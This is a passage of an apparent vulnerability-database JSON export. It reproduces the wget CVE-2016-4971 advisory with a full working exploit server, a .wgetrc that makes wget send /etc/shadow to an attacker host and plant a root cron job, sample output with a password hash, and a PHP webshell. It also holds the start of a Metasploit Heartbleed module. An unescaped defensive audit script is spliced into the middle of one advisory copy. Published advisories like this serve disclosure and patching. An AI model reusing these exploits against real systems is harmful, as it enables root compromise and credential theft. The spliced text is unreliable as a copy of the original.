then\\n\" % (FTP_HOST, FTP_PORT) \nelse: \n    print \"FTP is down :( Exiting.\" \n    exit(1) \n \nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT \n \nhandler.serve_forever() \n \n \n---[ eof ]--- \n \n \n \nThe attacker can run wget-exploit.py and wait a few minutes until the victim's server executes \nthe aforementioned cronjob with wget. \n \nThe output should look similar to: \n \n \n---[ wget-exploit.py output ]--- \n \nattackers-server# python ./wget-exploit.py \n \nReady? Is your FTP server running? \nFTP found open on 192.168.57.1:21. Let's go then \n \nServing wget exploit on port 80... \n \n \nWe have a volunteer requesting /database.db by GET :) \n \nUploading .wgetrc via ftp redirect vuln. It should land in /root \n \n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 - \nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \n \nWe have a volunteer requesting /database.db by POST :) \n \nReceived POST from wget, this should be the extracted /etc/shadow file: \n \n---[begin]--- \nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7::: \ndaemon:*:16484:0:99999:7::: \nbin:*:16484:0:99999:7::: \nsys:*:16484:0:99999:7::: \nsync:*:16484:0:99999:7::: \ngames:*:16484:0:99999:7::: \nman:*:16484:0:99999:7::: \nlp:*:16484:0:99999:7::: \n...cut... \n---[eof]--- \n \nSending back a cronjob script as a thank-you for the file... \nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response) \n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 - \n \nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n \n---[ output eof ]--- \n \n \nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file \nsetting to /etc/shadow. \nTherefore, on the next wget run, wget sent back the shadow file to the attacker. 
\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \nserver: \n \n \nroot@victim:~# cat /etc/cron.d/wget-root-shell \n* * * * * root /usr/bin/id > /root/hacked-via-wget \n \nroot@victim:~# cat /root/hacked-via-wget \nuid=0(root) gid=0(root) groups=0(root) \n \n \n \n2) PHP web application scenario \n \nIf wget is used within a PHP script e.g.: \n \n<?php \n \n// Update geoip data \n \nsystem(\"wget -N -P geoip http://attackers-host/goeip.db\"); \n \n?> \n \nAn attacker who manages to respond to the request could simply upload a PHP \nbackdoor of: \n \n<?php \n//webshell.php \n \nsystem($_GET['cmd']); \n?> \n \nby using the wget-exploit script described in example 1. \n \nAfter the upload they could simply execute the script and their shell \ncommand by a GET request to: \n \nhttp://victims-php-host/geoip/webshell.php?cmd=id \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nAffected versions of wget that connect to untrusted (or compromised) web \nservers could be tricked into uploading a file under an arbitrary name, or \neven path (if wget is run from a home directory). \nDepending on the context in which wget is used, this could lead to \nuploading a web shell and granting the attacker remote access to the \nsystem, or privilege escalation. It could be possible for attackers to escalate \nto root user if wget is run via a root cronjob, as is often the case in web \napplication deployments and is recommended in some guides on the Internet. \n \nThe vulnerability could also be exploited by well-positioned attackers within \nthe network who are able to intercept/modify the network traffic. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nAll versions of Wget before the patched version of 1.18 are affected. \n \nVIII. 
SOLUTION \n------------------------- \n \nUpdate to wget version 1.18 as advertised by the vendor at: \n \nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html \n \nLinux distributions should update their wget packages. It is recommended \nto update wget manually if an updated package is not available for your \ndistribution. \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt \n \nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html \n \nhttp://www.ubuntu.com/usn/usn-3012-1/ \n \nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1 \n \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971 \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \nlegalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \n06.07.2016 - Advisory released \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/137795/wget-fileuploadexec.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-07-08T18:47:09", "bulletinFamily": "exploit", "description": "GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution. CVE-2016-4971. 
Remote exploit for linux platform", "modified": "2016-07-06T00:00:00", "published": "2016-07-06T00:00:00", "id": "EDB-ID:40064", "href": "https://www.exploit-db.com/exploits/40064/", "type": "exploitdb", "title": "GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution", "sourceData": "=============================================\r\n- Release date: 06.07.2016\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n- CVE-2016-4971\r\n=============================================\r\n\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nGNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \r\nFTP, the most widely-used Internet protocols. \r\nIt is a non-interactive commandline tool, so it may easily be called from \r\nscripts, cron jobs, terminals without X-Windows support, etc.\r\n\r\nGNU Wget has many features to make retrieving large files or mirroring entire \r\nweb or FTP sites easy\r\n\"\r\n\r\nhttps://www.gnu.org/software/wget/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \r\ncompromised web server) can be tricked into saving an arbitrary remote file \r\nsupplied by an attacker, with arbitrary contents and filename under \r\nthe current directory and possibly other directories by writing to .wgetrc.\r\nDepending on the context in which wget is used, this can lead to remote code \r\nexecution and even root privilege escalation if wget is run via a root cronjob \r\nas is often the case in many web application deployments. \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n\r\n\r\nIV. 
DESCRIPTION\r\n-------------------------\r\n\r\nBecause of a lack of sufficient controls in wget, when a user downloads a file \r\nwith wget, such as:\r\n\r\nwget http://attackers-server/safe_file.txt\r\n\r\nan attacker who controls the server could make wget create an arbitrary file\r\nwith arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \r\ncontaining an FTP server reference in response to the victim's wget request. \r\n\r\nFor example, if the attacker's server replies with the following response:\r\n\r\nHTTP/1.1 302 Found\r\nCache-Control: private\r\nContent-Type: text/html; charset=UTF-8\r\nLocation: ftp://attackers-server/.bash_profile\r\nContent-Length: 262\r\nServer: Apache\r\n\r\nwget will automatically follow the redirect and will download a malicious\r\n.bash_profile file from a malicious FTP server. \r\nIt will fail to rename the file to the originally requested filename of \r\n'safe_file.txt' as it would normally do, in case of a redirect to another \r\nHTTP resource with a different name. \r\n\r\nBecause of this vulnerability, an attacker is able to upload an arbitrary file\r\nwith an arbitrary filename to the victim's current directory.\r\n\r\nExecution flow:\r\n\r\nvictim@trusty:~$ wget --version | head -n1\r\nGNU Wget 1.17 built on linux-gnu.\r\n\r\nvictim@trusty:~$ pwd\r\n/home/victim\r\n\r\nvictim@trusty:~$ ls\r\nvictim@trusty:~$ \r\n\r\nvictim@trusty:~$ wget http://attackers-server/safe-file.txt\r\nResolving attackers-server... 192.168.57.1\r\nConnecting to attackers-server|192.168.57.1|:80... connected.\r\nHTTP request sent, awaiting response... 302 Found\r\nLocation: ftp://192.168.57.1/.bash_profile [following]\r\n => \u2018.bash_profile\u2019\r\nConnecting to 192.168.57.1:21... connected.\r\nLogging in as anonymous ... Logged in!\r\n==> SYST ... done. ==> PWD ... done.\r\n==> TYPE I ... done. ==> CWD not needed.\r\n==> SIZE .bash_profile ... 55\r\n==> PASV ... done. ==> RETR .bash_profile ... 
done.\r\nLength: 55 (unauthoritative)\r\n\r\n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s\r\n\r\n2016-02-19 04:50:37 (1.27 MB/s) - \u2018.bash_profile\u2019 saved [55]\r\n\r\n\r\nvictim@trusty:~$ ls -l\r\ntotal 4\r\n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile\r\nvictim@trusty:~$ \r\n\r\n\r\nThis vulnerability will not work if extra options that force the destination\r\nfilename are specified as a parameter, such as -O /tmp/output.\r\nIt is however possible to exploit the issue with mirroring/recursive options\r\nenabled such as -r or -m.\r\n\r\nAnother limitation is that an attacker exploiting this vulnerability can only\r\nupload their malicious file to the current directory from which wget was run, \r\nor to a directory specified by the -P option (dir_prefix option).\r\nThis could however be enough to exploit wget run from a home directory, or\r\nwithin a web document root (in which case the attacker could write malicious php files\r\nor .bash_profile files).\r\n\r\nThe current directory limitation could also be bypassed by uploading a .wgetrc \r\nconfig file if wget was run from a home directory.\r\n\r\nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget\r\nsettings such as the destination directory for all downloaded files in future,\r\nas well as set a proxy setting to make future requests go through a malicious \r\nproxy server belonging to the attackers to which they could send further \r\nmalicious responses.\r\n\r\n\r\nHere is a set of Wget settings that can be helpful to an attacker:\r\n\r\ndir_prefix = string\r\n\tTop of directory tree\u2014the same as \u2018-P string\u2019.\r\n\r\npost_file = file\r\n\tUse POST as the method for all HTTP requests and send the contents of file in the request body. 
The same as \u2018--post-file=file\u2019.\r\n\r\nrecursive = on/off\r\n\tRecursive on/off\u2014the same as \u2018-r\u2019.\r\n\r\ntimestamping = on/off\r\n\tAllows overwriting existing files.\r\n\r\ncut_dirs = n\r\n\tIgnore n remote directory components. Allows an attacker to create directories with wget (when combined with the recursive option).\r\n\r\nhttp_proxy \r\n\tHTTP Proxy server\r\n\r\nhttps_proxy \r\n\tHTTPS Proxy server\r\n\r\noutput_document = file\r\n\tSet the output filename\u2014the same as \u2018-O file\u2019.\r\n\r\ninput = file\r\n\tRead the URLs from file, like \u2018-i file\u2019.\r\n\r\nmetalink-over-http\r\n\tIssues an HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \r\n Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.\r\n\r\n\r\n\r\nThe full list of .wgetrc options can be found at:\r\n\r\nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands\r\n\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n\r\n1) Cronjob with wget scenario\r\n\r\nOften wget is used inside cronjobs. By default cronjobs run within the home \r\ndirectory of the cronjob owner.\r\nSuch wget cronjobs are commonly used with many applications used to download \r\nnew versions of databases, requesting web scripts that perform scheduled tasks \r\nsuch as rebuilding indexes, cleaning caches etc. 
\r\nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \r\nthe Internet with exploitable wget cronjobs:\r\n\r\nhttps://codex.wordpress.org/Post_to_your_blog_using_email\r\nhttps://docs.moodle.org/2x/ca/Cron\r\nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site\r\nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel\r\n\r\nSuch a setup could be abused by attackers to upload a .bash_profile file through\r\nthe wget vulnerability and run commands in the context of the victim user upon \r\ntheir next log-in. \r\n\r\nAs cron runs periodically, attackers could also write out a .wgetrc file in the \r\nfirst response and then write to /etc/cron.d/malicious-cron in the second. \r\nIf a cronjob is run by root, this would give them almost instant root code \r\nexecution.\r\n\r\n\r\nIt is worth noting that if an attacker had access to the local network they could \r\npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \r\nresponses to wget requests.\r\n\r\nThis issue could also be exploited by attackers who have already gained \r\naccess to the server through a web vulnerability to escalate their privileges. 
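The .wgetrc-then-cron.d chain described above, and the -O mitigation noted in section IV, can be checked from the defender's side. The following Python 3 script is an added example and is not code from the advisory or from wget: it parses a wgetrc file and flags the directives the advisory lists as useful to an attacker, and it scans /etc/cron.d style lines for wget invocations that run as root, lack an explicit -O/--output-document, enable recursive or mirror mode, or fetch over plain http://. The sample .wgetrc and cron lines are constructed for the example (the vulnerable cron line is the one from the advisory); the rule that wget command names are case-, underscore- and hyphen-insensitive is taken from the wget manual.

```python
#!/usr/bin/env python3
"""Audit .wgetrc files and cron lines for the CVE-2016-4971 abuse pattern.

Added example, not code from the advisory or from wget. It looks at the
defender's side of the scenario: a planted .wgetrc that turns later wget
runs into uploads or writes to attacker-chosen paths, and cron jobs whose
wget invocation leaves the saved filename under server control.
"""
import re
import shlex

# Directives the advisory lists as useful to an attacker who controls
# .wgetrc, keyed by their normalized command name.
RISKY_WGETRC = {
    "dirprefix": "redirects every download into an attacker-chosen directory",
    "postfile": "turns every HTTP request into a POST that uploads a local file",
    "recursive": "enables recursive retrieval (writes many files)",
    "timestamping": "allows overwriting of existing files",
    "cutdirs": "lets recursive retrieval create directories",
    "httpproxy": "routes future HTTP requests through an attacker proxy",
    "httpsproxy": "routes future HTTPS requests through an attacker proxy",
    "outputdocument": "forces the destination path of every download",
    "input": "makes wget read its URL list from a file",
    "metalinkoverhttp": "switches to Metalink downloads driven by response headers",
}


def normalize_command(name):
    """wget treats command names as case-, underscore- and hyphen-insensitive
    (wget manual, Wgetrc Syntax): dir_prefix, DIR-PREFIX and dirprefix are
    the same command."""
    return re.sub(r"[-_]", "", name).lower()


def audit_wgetrc(text):
    """Return [(line_no, command, value, reason)] for every risky directive."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        command, value = (part.strip() for part in line.split("=", 1))
        key = normalize_command(command)
        if key in RISKY_WGETRC:
            findings.append((line_no, command, value, RISKY_WGETRC[key]))
    return findings


def audit_cron_line(line):
    """Return the issues found in one /etc/cron.d style line that runs wget.

    System crontab lines are 'min hour dom mon dow user command'; everything
    from the seventh field on is the shell command. Lines that do not run
    wget yield no issues.
    """
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return []
    fields = stripped.split(None, 6)
    if len(fields) < 7:
        return []
    user, command = fields[5], fields[6]
    try:
        argv = shlex.split(command)
    except ValueError:
        return ["unparseable command: %r" % command]
    if "wget" not in [arg.rsplit("/", 1)[-1] for arg in argv]:
        return []
    issues = []
    if user == "root":
        issues.append("wget runs as root: a planted .wgetrc lands in /root")
    if not any(a.startswith("-O") or a.startswith("--output-document") for a in argv):
        issues.append("no -O/--output-document: the redirect target controls the filename")
    if any(a in ("-r", "-m", "--recursive", "--mirror") for a in argv):
        issues.append("recursive/mirror mode: the server can make wget write many files")
    if any(a.startswith("http://") for a in argv):
        issues.append("plain http:// URL: an on-path attacker can inject the redirect")
    return issues


# Constructed sample input (not captured from a real host): the .wgetrc the
# advisory's PoC plants, a harmless directive and a differently spelled one.
SAMPLE_WGETRC = """\
# planted via the HTTP-to-FTP redirect
post_file = /etc/shadow
output_document = /etc/cron.d/wget-root-shell
quiet = on
DIr-PrefiX = /var/www/html
"""

# Constructed cron lines: the advisory's vulnerable job and a hardened one.
SAMPLE_CRON = [
    "*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1",
    "*/2 * * * * www-data wget -q -O /var/lib/app/database.db https://updates.example.org/database.db",
]

if __name__ == "__main__":
    for line_no, command, value, reason in audit_wgetrc(SAMPLE_WGETRC):
        print(".wgetrc line %d: %s = %s  (%s)" % (line_no, command, value, reason))
    for cron_line in SAMPLE_CRON:
        print(cron_line)
        for issue in audit_cron_line(cron_line) or ["no issues"]:
            print("  -", issue)
```

Run it against the .wgetrc of every account whose home directory a cron job runs in (root's included) and against /etc/cron.d and the per-user crontabs; the -O check is the one the advisory itself names as blocking the filename trick, and the root check reflects that a cron job's wget runs from, and reads .wgetrc in, the owner's home directory.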
\r\nIn many cases the cron jobs (as in examples above) are set up to request \r\nvarious web scripts e.g: \r\nhttp://localhost/clean-cache.php \r\n\r\nIf the file was writable by apache, and attacker had access to www-data/apache \r\naccount, they could modify it to return malicious Location header and exploit \r\nroot cronjob that runs the wget request in order to escalate their privileges \r\nto root.\r\n\r\n\r\nFor simplicity we can assume that attacker already has control over the server \r\nthat the victim sends the request to with wget.\r\n\r\nThe root cronjob on the victim server may look as follows:\r\n\r\nroot@victim:~# cat /etc/cron.d/update-database\r\n# Update database file every 2 minutes\r\n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1\r\n\r\n\r\nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \r\nand starts an FTP server:\r\n\r\nattackers-server# mkdir /tmp/ftptest\r\nattackers-server# cd /tmp/ftptest\r\n\r\nattackers-server# cat <<_EOF_>.wgetrc\r\npost_file = /etc/shadow\r\noutput_document = /etc/cron.d/wget-root-shell\r\n_EOF_\r\n\r\nattackers-server# sudo pip install pyftpdlib\r\nattackers-server# python -m pyftpdlib -p21 -w\r\n\r\n\r\nAt this point attacker can start an HTTP server which will exploit wget by\r\nsending malicious redirects to the victim wget's requests:\r\n \r\n---[ wget-exploit.py ]---\r\n\r\n#!/usr/bin/env python\r\n\r\n#\r\n# Wget 1.18 < Arbitrary File Upload Exploit\r\n# Dawid Golunski\r\n# dawid( at )legalhackers.com\r\n#\r\n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n#\r\n# CVE-2016-4971 \r\n#\r\n\r\nimport SimpleHTTPServer\r\nimport SocketServer\r\nimport socket;\r\n\r\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n def do_GET(self):\r\n # This takes care of sending .wgetrc\r\n\r\n print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\"\r\n if \"Wget\" not in 
self.headers.getheader('User-Agent'):\r\n\t print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n\r\n print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\"\r\n self.send_response(301)\r\n new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )\r\n print \"Sending redirect to %s \\n\"%(new_path)\r\n self.send_header('Location', new_path)\r\n self.end_headers()\r\n\r\n def do_POST(self):\r\n # In here we will receive extracted file and install a PoC cronjob\r\n\r\n print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n\t print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n\r\n content_len = int(self.headers.getheader('content-length', 0))\r\n post_body = self.rfile.read(content_len)\r\n print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body)\r\n\r\n print \"Sending back a cronjob script as a thank-you for the file...\" \r\n print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\"\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/plain')\r\n self.end_headers()\r\n self.wfile.write(ROOT_CRON)\r\n\r\n print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\"\r\n\r\n return\r\n\r\nHTTP_LISTEN_IP = '192.168.57.1'\r\nHTTP_LISTEN_PORT = 80\r\nFTP_HOST = '192.168.57.1'\r\nFTP_PORT = 21\r\n\r\nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\"\r\n\r\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n\r\nprint \"Ready? 
Is your FTP server running?\"\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\r\nif result == 0:\r\n print \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)\r\nelse:\r\n print \"FTP is down :( Exiting.\"\r\n exit(1)\r\n\r\nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT\r\n\r\nhandler.serve_forever()\r\n\r\n\r\n---[ eof ]---\r\n\r\n\r\n\r\nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes\r\nthe aforementioned cronjob with wget.\r\n\r\nThe output should look similar to:\r\n\r\n\r\n---[ wget-exploit.py output ]---\r\n\r\nattackers-server# python ./wget-exploit.py \r\n\r\nReady? Is your FTP server running?\r\nFTP found open on 192.168.57.1:21. Let's go then\r\n\r\nServing wget exploit on port 80...\r\n\r\n\r\nWe have a volunteer requesting /database.db by GET :)\r\n\r\nUploading .wgetrc via ftp redirect vuln. It should land in /root \r\n\r\n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 -\r\nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \r\n\r\nWe have a volunteer requesting /database.db by POST :)\r\n\r\nReceived POST from wget, this should be the extracted /etc/shadow file: \r\n\r\n---[begin]---\r\nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::\r\ndaemon:*:16484:0:99999:7:::\r\nbin:*:16484:0:99999:7:::\r\nsys:*:16484:0:99999:7:::\r\nsync:*:16484:0:99999:7:::\r\ngames:*:16484:0:99999:7:::\r\nman:*:16484:0:99999:7:::\r\nlp:*:16484:0:99999:7:::\r\n...cut...\r\n---[eof]---\r\n\r\nSending back a cronjob script as a thank-you for the file...\r\nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\r\n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 -\r\n\r\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! 
:) \r\n\r\n---[ output eof ]---\r\n\r\n\r\nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file\r\nsetting to /etc/shadow.\r\nTherefore, on the next wget run, wget sent back the shadow file to the attacker.\r\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \r\ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \r\nserver:\r\n\r\n\r\nroot@victim:~# cat /etc/cron.d/wget-root-shell \r\n* * * * * root /usr/bin/id > /root/hacked-via-wget \r\n\r\nroot@victim:~# cat /root/hacked-via-wget \r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n\r\n\r\n2) PHP web application scenario\r\n\r\nIf wget is used within a PHP script e.g.:\r\n\r\n<?php\r\n\r\n// Update geoip data\r\n\r\n system(\"wget -N -P geoip http://attackers-host/goeip.db\");\t\r\n\r\n?>\r\n\r\nAn attacker who manages to respond to the request could simply upload a PHP\r\nbackdoor of:\r\n\r\n<?php\r\n\t//webshell.php\r\n\r\n\tsystem($_GET['cmd']);\r\n?>\r\n\r\nby using the wget-exploit script described in example 1.\r\n\r\nAfter the upload they could simply execute the script and their shell\r\ncommand by a GET request to:\r\n\r\nhttp://victims-php-host/geoip/webshell.php?cmd=id\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nAffected versions of wget that connect to untrusted (or compromised) web \r\nservers could be tricked into uploading a file under an arbitrary name, or\r\neven path (if wget is run from a home directory).\r\nDepending on the context in which wget is used, this could lead to\r\nuploading a web shell and granting the attacker remote access to the\r\nsystem, or privilege escalation. 
It could be possible for attackers to escalate\r\nto root user if wget is run via a root cronjob, as is often the case in web \r\napplication deployments and is recommended in some guides on the Internet.\r\n\r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nAll versions of Wget before the patched version of 1.18 are affected.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nUpdate to wget version 1.18 as advertised by the vendor at:\r\n\r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n\r\nLinux distributions should update their wget packages. It is recommended\r\nto update wget manually if an updated package is not available for your\r\ndistribution.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n\r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n\r\nhttp://www.ubuntu.com/usn/usn-3012-1/\r\n\r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n06.07.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. 
I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40064/"}], "metasploit": [{"lastseen": "2019-11-25T12:50:38", "bulletinFamily": "exploit", "description": "This module provides a fake SSL service that is intended to leak memory from client systems as they connect. This module is hardcoded for using the AES-128-CBC-SHA1 cipher.\n", "modified": "2018-08-27T18:11:22", "published": "2014-04-09T14:38:11", "id": "MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY", "href": "", "type": "metasploit", "title": "OpenSSL Heartbeat (Heartbleed) Client Memory Exposure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TcpServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure',\n 'Description' => %q{\n This module provides a fake SSL service that is intended to\n leak memory from client systems as they connect. 
This module is\n hardcoded for using the AES-128-CBC-SHA1 cipher.\n },\n 'Author' =>\n [\n 'Neel Mehta', # Vulnerability discovery\n 'Riku', # Vulnerability discovery\n 'Antti', # Vulnerability discovery\n 'Matti', # Vulnerability discovery\n 'hdm' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [['Capture']],\n 'PassiveActions' => ['Capture'],\n 'DefaultAction' => 'Capture',\n 'References' =>\n [\n [ 'CVE', '2014-0160' ],\n [ 'US-CERT-VU', '720951' ],\n [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],\n [ 'URL', 'http://heartbleed.com/' ]\n ],\n 'DisclosureDate' => 'Apr 07 2014',\n 'Notes' =>\n {\n 'AKA' => ['Heartbleed']\n }\n\n )\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8443 ]),\n OptInt.new('HEARTBEAT_LIMIT', [true, \"The number of kilobytes of data to capture at most from each client\", 512]),\n OptInt.new('HEARTBEAT_READ', [true, \"The number of bytes to leak in the heartbeat response\", 65535]),\n OptBool.new('NEGOTIATE_TLS', [true, \"Set this to true to negotiate TLS and often leak more data at the cost of CA validation\", false])\n ])\n end\n\n # Initialize the client state and RSA key for this session\n def setup\n super\n @state = {}\n @cert_key = OpenSSL::PKey::RSA.new(1024){ } if negotiate_tls?\n end\n\n # Setup the server module and start handling requests\n def run\n print_status(\"Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...\")\n exploit\n end\n\n # Determine how much memory to leak with each request\n def heartbeat_read_size\n datastore['HEARTBEAT_READ'].to_i\n end\n\n # Determine how much heartbeat data to capture at the most\n def heartbeat_limit\n datastore['HEARTBEAT_LIMIT'].to_i * 1024\n end\n\n # Determine whether we should negotiate TLS or not\n def negotiate_tls?\n !! 
datastore['NEGOTIATE_TLS']\n end\n\n # Initialize a new state for every client\n def on_client_connect(c)\n @state[c] = {\n :name => \"#{c.peerhost}:#{c.peerport}\",\n :ip => c.peerhost,\n :port => c.peerport,\n :heartbeats => \"\",\n :server_random => [Time.now.to_i].pack(\"N\") + Rex::Text.rand_text(28)\n }\n print_status(\"#{@state[c][:name]} Connected\")\n end\n\n # Buffer messages and parse them once they are fully received\n def on_client_data(c)\n data = c.get_once\n return if not data\n @state[c][:buff] ||= \"\"\n @state[c][:buff] << data\n process_request(c)\n end\n\n # Extract TLS messages from the buffer and process them\n def process_request(c)\n\n # Make this slightly harder to DoS\n if @state[c][:buff].to_s.length > (1024*128)\n print_status(\"#{@state[c][:name]} Buffer limit reached, dropping connection\")\n c.close\n return\n end\n\n # Process any buffered messages\n loop do\n break unless @state[c][:buff]\n\n message_type, message_ver, message_len = @state[c][:buff].unpack(\"Cnn\")\n break unless message_len\n break unless @state[c][:buff].length >= message_len+5\n\n mesg = @state[c][:buff].slice!(0, message_len+5)\n\n if @state[c][:encrypted]\n process_openssl_encrypted_request(c, mesg)\n else\n process_openssl_cleartext_request(c, mesg)\n end\n end\n end\n\n # Process cleartext 